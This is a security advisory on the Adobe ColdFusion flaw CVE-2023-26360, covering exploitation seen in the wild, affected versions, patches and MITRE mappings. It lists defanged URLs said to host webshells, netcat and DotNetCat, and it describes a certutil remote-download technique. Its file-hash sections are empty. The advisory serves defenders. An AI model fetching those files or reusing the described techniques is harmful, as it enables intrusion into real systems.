Get in Touch
Update – Adobe ColdFusion vulnerability exploited (21st March 2023 at 15:13 UTC)
Active exploitation of Adobe ColdFusion vulnerabilities has been detected by cyber security researchers at Rapid7. At the time of writing, the reported instances have not been attributed to the recently reported Adobe ColdFusion vulnerability, tracked as CVE-2023-26360. However, a potential association has not been explicitly ruled out as of yet.
The timeline of the reported exploitation dates back to January 2023. Investigations have indicated that a threat actor deployed webshells using an encoded PowerShell command, a technique applied when redirecting strings into files when creating webshells.
Moreover, the instance discovered the utilisation of the ‘certutil.exe’ binary with the ‘-urlcache’ flag being passed to it, a technique that is applied by threat actors to retrieve files hosted on a remote web server.
Updated Indicators of Compromise
– www.av-iq[.]com – FQDN
– www.ooshirts[.]com – FQDN
– hXXps://www.av-iq[.]com/wow.txt – FQDN
– hXXps://www.ooshirts[.]com/images/zzz.txt – FQDN
– hXXps://www.ooshirts[.]com/images/dncat.exe – URL
– hXXp://www.ooshirts[.]com/images/nc.exe – URL
File hashes (SHA- 256):
File hashes (SHA-1):
File hashes (MD-5):
– WOW.TXT – ColdFusion WebShell
– wow.txt – ColdFusion WebShell
– www.txt – ColdFusion WebShell
– www.cfm – ColdFusion WebShell
– wow1.cfm – ColdFusion WebShell
– zzz.txt – ColdFusion WebShell
– dncat.exe – DotNetCat
– nc.exe – NetCat
Updated Mitre Methodologies
TA0042– Resource Development
Indiscriminate, opportunistic targeting.
Severity Level – Critical: Compromise may result in the loss of confidentiality and integrity of data.
A critical arbitrary code execution security flaw has been disclosed as affecting Adobe ColdFusion. The vulnerability, tracked as CVE-2023-26360 (CVSSv3 score: 8.6), is caused by an Improper Access Control weakness and has the potential to be exploited by remote unauthenticated threat actors in low-complexity attacks. Adobe reported that the vulnerability is currently being exploited in the wild “in very limited attacks”.
The vulnerability was added by the Cybersecurity and Infrastructure Security Agency (CISA) to its catalogue of security flaws exploited in the wild and they have given Federal Civilian Executive Branch (FCEB) agencies until 5th April 2023 to apply the relevant updates to safeguard their networks against potential threats.
Successful exploitation of CVE-2023-26360 could enable threat actors to gain arbitrary code execution and arbitrary file system read capabilities, in relation to the affected Adobe product versions.
Adobe has released patches pertaining to the security flaw for the respective product versions. As such, previous versions are vulnerable to the potential exploits.
– Adobe ColdFusion 2018: Update 15 and earlier
– Adobe ColdFusion 2021: Update 5 and earlier
It should be noted that CVE-2023-26360 also affects Adobe ColdFusion 2016 and ColdFusion 11 installations, neither of which are supported as they have reached end-of-life (EoL).
Containment, Mitigations & Remediations
It is strongly recommended that administrators apply the following Adobe updates:
– Adobe ColdFusion 2018: Update 16
– Adobe ColdFusion 2021: Update 6
Indicators of Compromise
No specific Indicators of Compromise (IoCs) are available at this time.
Adobe occupies a significant portion of the application-development market share. Threat actors generally utilise a combination of probability and asset value to determine which attack surfaces to focus on. As a result, application-development products can emerge as a prime target. Due to the fact that Adobe products have become an integral aspect of personal and business operations, threat actors will continue to exploit the associated vulnerabilities in an attempt to exfiltrate sensitive data contained therein or impact associated business operations.
No attribution to specific threat actors or groups has been identified at the time of writing.
– TA0004 – Privilege Escalation
– T1055.001– Process Injection: Dynamic-link Library Injection
Common Weakness Enumeration:
– CWE-284 – Improper Access Control